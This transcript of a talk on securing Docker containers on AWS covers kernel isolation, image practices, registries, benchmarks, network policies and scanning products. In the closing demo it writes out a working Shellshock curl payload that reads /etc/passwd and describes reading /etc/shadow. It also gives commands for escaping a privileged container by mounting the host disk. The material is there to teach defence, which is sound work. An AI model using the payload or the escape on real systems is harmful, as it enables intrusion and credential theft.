AWS, Containers

Marcus Maxwell, DevOps Practitioner here at Contino, explains how to secure containers on AWS - how to put the Sec in DevOps, building secure images, ensuring the platform is safe, best practice and what happens if you ignore his advice!


I'm Marcus. What I do: I mostly deploy containers in big enterprises, on all the weirdest platforms available to the world, so Oracle Private Cloud, anything on VMware, bare metal, Red Hat Linux 6. I've done it all. It's always a lot of fun. I'm certified, if that matters to anyone. And those are my addresses where you can reach me. First question, and this is a bit of a stretch: who is using containers? Just so I know how many people have heard about containers, or just, sort of, run Docker.

Anyone using ECS? A few people. Cool. I have a little bit of information about that, but it will be more general, so it applies pretty much anywhere you're running containers.

So the main features of containers pretty much boil down to two things: namespaces and cgroups. One is for isolation, the other for limiting the resources a container can use. The main one is namespaces, which have been in the kernel for a very long while. So what do they allow you? Essentially they let you emulate a small, isolated system; if you've ever used chroot you've experienced something like it. You can hide the hostname, so the container has a different hostname. You have your own PID 1. You have your own file system, so you cannot access the host's, and it's nice and isolated. So if you're running your containers in VMs, you have this additional level of security where that information is hidden for you.
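A quick way to see namespaces in action, without any container runtime, is to look under /proc. This is a Linux-only sketch; the `unshare` line is shown as a comment because it needs root:

```shell
# Every process runs inside a set of namespaces; a container is just a
# process whose namespaces differ from the host's. List this shell's:
ls /proc/self/ns
# Each entry is one isolation axis: uts (hostname), pid, mnt (filesystem),
# net, ipc, user, cgroup. The container runtime unshares these for you.
# Doing one by hand, roughly (needs root):
#   unshare --uts sh -c 'hostname isolated-demo; hostname'
```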

Another one is cgroups. Cgroups are mainly for controlling the amount of CPU, memory and any other resources that containers use. So the main issue: say you're running a hosting company and you've decided to run all your Apache web servers in Docker. One customer is getting a lot of traffic, they were on Reddit or Hacker News, and their containers are maxing out the CPU on the host. If you didn't implement cgroups, that workload will essentially use all of the host's CPU and memory and exhaust its resources, and that can be counted as a security risk. So, always use cgroups.
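As a sketch, assuming a Docker host (the container and image names are illustrative), the cgroup limits for one of those web-server containers might look like:

```shell
# Cap one tenant's web server so a traffic spike can't starve the host.
# --cpus bounds CPU time; --memory is a hard cap (the OOM killer fires
# beyond it); --memory-swap equal to --memory disables extra swap;
# --pids-limit guards against fork bombs.
docker run -d --name tenant-web \
  --cpus 1.5 \
  --memory 512m \
  --memory-swap 512m \
  --pids-limit 200 \
  httpd:2.4
```

Under the hood each flag just writes a value into that container's cgroup; the kernel does the enforcement.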

Next up there are three more things, depending on the OS you are running. The universal one is seccomp. Seccomp essentially prevents you from making certain system calls against the kernel. For example, I think there are around 400 system calls, and Docker by default disables around 40 of them, because they are relatively safe to turn off. If you're running containers, you're pretty sure you don't want to reboot a container from inside the container, or allow it to reboot your host. Usually that's not the use case you want. So by default those are disabled, and if you really want to tweak it, there are tools that allow you to really lock it down, so a container can't mount filesystems, modify the time on your host, or do other funky stuff.
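To go beyond the default, you can pass Docker your own profile. The fragment below writes a deliberately tiny, illustrative allow-list profile; it is a sketch of the profile format, not something a real service could run under (real workloads need a much longer syscall list):

```shell
# Write a minimal seccomp profile: deny every syscall except an
# explicit allow-list.
cat > restricted-seccomp.json <<'EOF'
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "names": ["read", "write", "close", "exit", "exit_group",
                "futex", "rt_sigreturn"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
EOF
# Apply it to a container (assumes a Docker host):
#   docker run --security-opt seccomp=restricted-seccomp.json alpine echo hi
```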
If you're running anything from Red Hat you will have SELinux, and you will probably be running the Red Hat-packaged Docker, which is still stuck at 1.12. So you'll have that, and if you're running SELinux, the demo I'll show later would not have worked. If you're on Ubuntu, you will have AppArmor, which is a little more sane, some people will say, but not as thorough at preventing things. The goal of SELinux and AppArmor is essentially to prevent the container from escaping and doing massive damage to your host, because if someone escapes from the container, that's the biggest risk you have.

So, building secure images: a little bit about the life cycle and best practices for containers. The main one is to establish a standard image. One of the most common things when you go into an enterprise organization, like a bank: either they have just started their journey, or they are somewhere in the process of establishing ECS, moving to [inaudible 00:04:59], or anything in between. And the main issue is they start using images from Docker Hub or from other places and just allow them to run on the platform. That's the main risk, because you have your host, you have your Linux team that over a long time developed the security practices and all the checks that are required, and then you have this myriad of OSes running on your host.

So for example, say you're a Red Hat shop. You have everything on Red Hat, your SELinux policies are configured, you're pretty happy, no major incidents, and then someone starts running something like Ubuntu 12.04, which is now outdated, across everything. You start getting bugs, your help desk gets worried because they don't know how to debug a different OS's issues, and then you have all these problems and you cannot properly track what's actually running on your platform.

Another thing, when you're establishing the standard image, is to have something like [inaudible 00:06:11], or Dataware, or whatever versioning policy you want. Usually the major version is 7, so it matches your OS image, and then you have dot releases for security patches, and you always make sure the Docker pull policy is based on that.
You should also make sure you have some kind of tool, inside ECS or Kubernetes or whatever else you are running, that checks what is actually running. It goes and sees what the base image is, and if it's not what you expect, it essentially kills that container.
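A sketch of that check, with the container list stubbed out so the filter logic is visible. In practice the list would come from `docker ps --format '{{.Names}} {{.Image}}'` or your orchestrator's API, and all the registry and container names here are hypothetical:

```shell
APPROVED="registry.example.com/base/rhel"
# Stubbed name/image pairs, as docker ps would report them:
RUNNING='web-1 registry.example.com/base/rhel:7.4
web-2 registry.example.com/base/rhel:7.4
batch-1 ubuntu:12.04'
echo "$RUNNING" | while read -r name image; do
  case "$image" in
    "$APPROVED"*) ;;  # built from the standard image: fine
    *) echo "non-standard image: $name runs $image" ;;  # candidate to kill
  esac
done
```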

This is an opinion I've developed; you might agree, you might not. When you come into an organization, especially a big one, it will already have an established Unix shop, so use the same OS, at least when you are starting off. Sometimes you see a mix, and then the regular Unix admins have trouble picking it up and you're essentially just creating more work, because the difference between the Ubuntu and CentOS images is maybe 20 megabytes in size. They are both a little bulky, so they're much the same. Once you have established how you like to run containers, and you're more proficient, then you should probably start optimizing towards BusyBox and Alpine images.

Keep your images small. The main reason is to reduce the attack surface. Size on its own is not really a reason, if you're using the same standard image with the same layers, because shared layers won't be re-downloaded, and between VMs and bare metal the connection is usually so fast you don't really care. The problem is when you're essentially running a VM in a container. I've sometimes seen someone install [inaudible 00:08:24], a full GNOME desktop; they would RDP into the container and work in it, because the machines they were provided were Windows and they really wanted a Linux environment. That creates a myriad of problems, because you've just installed everything into that image.

Use a private registry; don't really depend on any external ones. Docker Hub is pretty good, and you can have a private Docker Hub if you want, but especially if you're in AWS, use ECR: it works, it's simple, it has nice security built in, you need tokens, and it won't allow you to just push and pull whatever you want. If you don't do that, especially if you use third-party images from Quay or Google, you will essentially have a problem where you can't even see the Dockerfile. You're essentially pulling binaries and hoping that they are secure, which is not really best practice.
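The ECR push flow, sketched with the current AWS CLI (the older `aws ecr get-login` worked similarly; the region, the 123456789012 account ID, and the image name are placeholders):

```shell
REGISTRY=123456789012.dkr.ecr.eu-west-1.amazonaws.com  # placeholder account
# Get a short-lived token and log the Docker client in to ECR:
aws ecr get-login-password --region eu-west-1 |
  docker login --username AWS --password-stdin "$REGISTRY"
# Tag and push a locally built image into the private registry:
docker tag myapp:1.0.3 "$REGISTRY/myapp:1.0.3"
docker push "$REGISTRY/myapp:1.0.3"
```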

Don't embed your secrets into images and don't embed any confidential data. Use HashiCorp Vault, like Jordan explained. It integrates very nicely, it's very simple, and your application should never really depend on having secrets built into the image.

I think Daniel showed some CIS benchmarks. The CIS benchmarks are available for a myriad of products, and there is one for Docker, provided as a bunch of shell scripts and Python scripts, plus one from Docker itself. So this is the Docker security benchmark; I hope that's easy to see. Essentially, you will almost always fail some checks, but that's okay. The main thing is that it shows you the issues with your Docker deployment on the VM: for example, if you're mounting something incorrectly, your drivers are set incorrectly, or your daemon is badly set up. A failure rate of around 10% is usually okay, because if you really lock things down, or you don't even allow privileged containers, some of your monitoring, auditing and security tooling will fail the checks. So understand what the Docker benchmark is actually telling you, and be careful.
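The Docker security benchmark described here is published by Docker as a set of shell scripts; a typical run looks roughly like this (needs network access to clone, and root on the Docker host to inspect the daemon):

```shell
# Fetch and run Docker's CIS-based security benchmark against this host.
git clone https://github.com/docker/docker-bench-security.git
cd docker-bench-security
sudo sh docker-bench-security.sh
```

Each check prints PASS, WARN or INFO with the corresponding CIS benchmark section number, so you can look up why a given check matters.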

A note about networking and storage. If you're really, really just starting out, don't try to run persistent containers. It's possible, but you really need a proper storage back end, and in an enterprise that will probably just be NFS. If you are on AWS you have EBS, which is amazing. So if you are on AWS, yes, please, but really be careful what you're mounting, and mostly don't allow everything to just go and create a volume and mount it because it can. If a volume is read-only, you're really limiting the attack surface: the attacker cannot write or modify any files, which really limits the scope of what they can do.
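A sketch of that read-only idea, assuming a Docker host (the volume and container names are illustrative):

```shell
# Root filesystem read-only, a tmpfs for scratch files, and the content
# volume mounted read-only so a compromised process can't modify it.
docker run -d --name static-web \
  --read-only \
  --tmpfs /tmp \
  -v webcontent:/usr/share/nginx/html:ro \
  nginx:alpine
```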

Also set quotas, because, especially if you build a platform that's more of a development platform for developers than an application platform, the main thing you will see is developers keeping containers running, probably for a very long while. You'll see a container that has been running for a month, which your monitoring should probably detect and disallow. But if you actually let them do that, those containers will generate so many logs that you will probably run out of storage and might essentially crash the whole platform. I saw an entire NetApp array almost die because a container just took up too much storage.
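One concrete quota that prevents exactly this log-growth failure is the Docker daemon's log rotation settings. A sketch of what would go in `/etc/docker/daemon.json` (written to /tmp here so the snippet is harmless to run as-is):

```shell
cat > /tmp/daemon.json <<'EOF'
{
  "log-driver": "json-file",
  "log-opts": {
    "max-size": "10m",
    "max-file": "3"
  }
}
EOF
# In real use, place this at /etc/docker/daemon.json and restart the
# daemon; each container's logs are then capped at 3 files x 10 MB.
```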

So, networking: like the cat says, you should limit what talks to what. Docker has a feature called linking, and you can also limit containers with network policies on different network drivers. You have Calico, which allows you to set up network policies, essentially firewalling your containers off from each other. Say you have 20 web servers: there is no reason web server A should talk to web server Z, because they should only receive traffic from the load balancer, not from each other, right? There's no reason for them to talk. Now say you have the usual three-tier architecture: a database, a web server and some other things. If your database suddenly starts calling your web server, then you probably know someone is on the database doing something dodgy that they shouldn't be doing.
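With Kubernetes plus a driver like Calico, that "web servers shouldn't talk to each other" rule can be written as a NetworkPolicy. An illustrative sketch; the names and labels are hypothetical:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: web-from-lb-only
spec:
  podSelector:
    matchLabels:
      tier: web             # applies to every web pod
  ingress:
    - from:
        - podSelector:
            matchLabels:
              tier: ingress # only the load-balancer tier may connect
      ports:
        - protocol: TCP
          port: 80
```

Because the policy selects the web pods and only whitelists ingress traffic, web-to-web connections are dropped by default.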

So there are a few vendor products. The situation, sadly, as it stands: there is a lot of work you will have to reinvent if you try to do it yourself from scratch, especially if you're really, really into proper security and you want to know what's happening, because a container is a bit of a black box. You cannot install an agent into a container, because you're essentially blowing up the size, and you should treat containers like cattle, not pets. Because you will be monitoring from the outside, you have less visibility, in a way, into what's happening in the container. But the Docker daemon (and containerd too) exposes a lot of information, so you can just listen on the socket and monitor from that side. If you really don't want to spend too much time, especially on the basics (a CI/CD pipeline, basic monitoring, some established policies), there are products for that. Sysdig Falco is free if you want it; Aqua Security and Twistlock offer enterprise products. I don't really have an opinion on which one is better; they have similar features.

So that's Aqua Security; it essentially looks a little like this, sorry for the quality. You have your images and it scans them against known CVEs, and then it shows you: these are the high CVEs, these are the medium ones. You can set policies: if an image has a high CVE, don't allow it to run on the platform; if there are a few minor CVEs, that's okay; if it's more, don't do it, because you can usually chain CVEs to get to a high-severity one, right? So that's how it looks: a very nice platform, and security people in the organization will usually enjoy seeing something like this.

This is Twistlock. Twistlock is a similar product: it also gives you visualizations, tells you what vulnerabilities and compliance issues you have, and gives you a nice map of everything. Then you have Falco, and Falco works a little like InSpec. The first example is probably the best, the other ones are quite complicated, but it essentially checks what's running in your cluster. Say you don't want anything running Bash in your containers. Nobody should be exec'ing into containers and doing any debugging; they should be debugging only through logs. Nobody should ever get into a container, because usually we will assume it's an attacker. So you can write a rule that checks for proc.name bash, and you will see that. Falco is still a little hard to configure, but it's one of the best open-source tools out there.
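A Falco rule for that "nobody should run Bash in a container" policy looks roughly like this (the rule name and output text are illustrative):

```yaml
- rule: shell_in_container
  desc: >
    A shell was spawned inside a container; likely an attacker, or
    someone debugging by hand instead of through logs.
  condition: container.id != host and proc.name = bash
  output: "Shell started in a container (user=%user.name container=%container.id)"
  priority: WARNING
```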

The main thing I've seen recently, quite a few times now: people move to this container world and think, "I don't need to maintain my OS; it's a dumb thing that just runs containers, I really don't care what it is anymore. I don't need all those agents I had, I don't need to worry about it so much." The thing is, containers depend on the OS. They depend primarily on the kernel being up to date, and on other pieces like the Docker engine being up to date too. If you don't do that, you will hit those issues. So you can still use your [inaudible 00:17:57], it didn't go away; Chef didn't go away. If you still have that tooling you should just improve upon it, maybe rethink how you did it and make it a little more streamlined, but the OS still matters. You still have to tweak it and harden it.

There's a nice [inaudible 00:18:18] project that I usually recommend when I come into any kind of project: the dev-sec Linux baseline. It's essentially like a CIS benchmark of checks for how your OS is configured, and they also provide Chef [inaudible 00:18:37] playbooks, which you can run to bring the OS into that compliant state. It might not be exactly the state you want, because they're really tight on security (it prevents you from doing a few things), but it's a nice baseline and a good way to check what you're actually running.

Don't forget your AWS account if you're running ECS, or wherever you're running on any other cloud platform. You still have to maintain your AWS account: even if you are using ECS you should still be limiting access to the hosts, you should still have CloudWatch and CloudTrail, and you should integrate those tools into monitoring your containers and ensuring it's all there. If you are using ECS, I think a year or so ago they announced IAM roles for tasks, which essentially allows you to have an IAM role specific to one container instead of to the whole host. That way one container will not be able to use another container's credentials, which is quite cool. So it's not really [inaudible 00:19:47], but it gives you that security.
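In the ECS task definition this is just the `taskRoleArn` field. A trimmed, illustrative fragment; the account ID, role name and image are placeholders:

```json
{
  "family": "web",
  "taskRoleArn": "arn:aws:iam::123456789012:role/web-task-role",
  "containerDefinitions": [
    {
      "name": "web",
      "image": "123456789012.dkr.ecr.eu-west-1.amazonaws.com/myapp:1.0.3",
      "memory": 256,
      "essential": true
    }
  ]
}
```

Credentials for that role are then served to this task only, instead of every container inheriting the EC2 instance profile.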

So, like Daniel mentioned, the shared responsibility model is something to always keep in mind. AWS maintains the platform: ECS itself, the EC2 maintenance. But they don't maintain the OS you're running on EC2, they don't maintain your Docker images, and they don't maintain your application. You always have to remember that: it's up to you, not AWS.

So, to summarize: build your own images and roll them out regularly. Usually, don't run containers for longer than a week. You might do it, and there might not be much harm in it, but refreshing regularly sets you up in a pattern of working where you always expect to be running the latest version, and it surfaces failures in your system, for example when you have to reboot a machine. You don't want a long-running container, because the older a container gets, the harder it is to kill. So don't do that. Keep the images as minimal as possible. Don't install htop and all the other tooling you think you might need one day; one day you might find there was a vulnerability in one of those tools, and that's how your container got owned.

Make sure you have some security scanning at build time and while you're running the containers. You can use Twistlock or Aqua Security, or other CVE-scanning tools like Nexus if you already have them, because some of the enterprise products now support that. Make sure you build that into your CI/CD pipelines. Don't forget about the OS, and don't forget to maintain your AWS account with good policies. So now, a short demo of what happens if you didn't listen to any of this advice and, in this specific case, you didn't patch. Just to show you a quick demo of ECS: there's single sign-on, which assumes a role into my account, again an AWS best practice. Then I have EC2 Container Service and my cluster; it's a single node, and I have this task definition. Essentially, I'm going to demo Shellshock. I really wanted to demo the way Equifax was recently hacked, if anyone was reading about that, which was the Struts vulnerability, but the payload to hack into [inaudible 00:22:44] is a little bigger and doesn't make as nice a demo.

So this is a very simple Shellshock demo. Let's run the task. Thanks to hmlio, who created this image. Essentially it's an Apache web server with CGI enabled, and there's nothing special about it; it just grabs an old version of Bash, which is vulnerable to Shellshock. If you want to check what's actually happening: there's this CGI script, which is essentially Bash. The script itself is not vulnerable, it's all very nice and clean, but because it's an old version of Bash, when CGI parses the request and you send it the payload, it essentially gets hacked. So I can do this ... and as you see, let me try to make it a bit bigger. What's happening is, you have your very regular Shellshock exploit here.
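The exploit itself is a one-liner: the classic Shellshock payload goes into any HTTP header that CGI exports as an environment variable. The host, port and CGI path below are illustrative; point it at wherever the demo container is listening:

```shell
# A function definition followed by trailing commands; a vulnerable Bash
# executes the trailing part when it imports the variable from the
# CGI environment. The leading echos terminate the HTTP headers so the
# command output comes back in the response body.
curl -H 'User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd' \
  http://localhost:8080/cgi-bin/status
```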

The payload defines a kind of function that gets called, and that is all that's needed to get a remote shell on the host, right? So what this allows me to do now is, say, grab passwd, and that gives me passwd. I can then also grab shadow if I want, which is the scarier bit. Yes, that does work; I forgot about that. So you can grab all of this data, you can create a remote shell if you want, and essentially you have credentials from the host to do different things. Now, this is not as scary as it sounds: I got shell access to the container, so if I'm not running anything else vulnerable, and I didn't run the container in privileged mode, then it's still a lot more difficult to escape from the container to the host. You have shell access, you can probably send some mail, you can probably mine some bitcoin, but just getting a shell didn't really do that much to you. But suppose you do run privileged containers, because you want to just mount and see the file system, or say you were running a monitoring tool, which always seems to require privileged containers.

So say you do this. Then you can run mount and see all the mount points, and you can see that I have this thingy here. I also have this thing: there's /dev and an NVMe drive, so it has nvme0n1 with partition p1, right? If I'm running a privileged container, that means I'm essentially running as root on the host. So what I can do now is take that device, mount it into /mnt, go there, and I can see my bootloader files; I can essentially modify anything I want on the host, steal all the keys, plant anything malicious I want. That's why people say don't run privileged containers: if there's any exploit through which an attacker gets a shell into your system, you're going to be screwed, because you've essentially just given them root access, and it's super easy to escape from the container that way. In all other cases escapes really depend on circumstances: the kernel capability wasn't there, or the binaries weren't mounted, or something else. So make sure the containers you run as privileged are very few and always properly monitored.
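The escape described here really is just a few commands from inside a privileged container. A sketch only; device names vary per host, and this should never be run anywhere you care about:

```shell
# Inside a *privileged* container the host's block devices are visible:
ls /dev/nvme*            # e.g. /dev/nvme0n1 and its partition nvme0n1p1
# Mount the host's root partition and you are effectively root on the host:
mount /dev/nvme0n1p1 /mnt
ls /mnt                  # host filesystem: /boot, /etc, keys, everything
# From here an attacker can read secrets or plant whatever they like.
```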

Also, about SELinux: there's a quite nice blog post on this, and it applies more to plain OS security. If you were running SELinux, SELinux actually prevented Shellshock. Everyone who had it enabled and didn't disable it was actually protected from Shellshock. So while it might sometimes give you headaches to configure, in a lot of cases it can actually prevent zero-day exploits on your systems. If you want to learn more, Docker has a pretty good page about security, and there's a re:Invent talk that goes deeper into the subject. And if you just want to understand what seccomp, namespaces and cgroups are, and play around with them on the command line without any containers, you can go to Julia Evans' blog, where she explains what a container essentially is and what the building blocks are.

  • Marcus Maxwell


    Marcus’s passion is to help clients on their DevOps journey, from automating build pipelines and managing containers at scale to solving security issues and helping out with organizational problems.

    He tries to take a multidisciplinary approach to solving issues and always makes sure to over-communicate with the client's team, so that everyone knows what the issues at hand are and how we will solve them together.

    More Articles by Marcus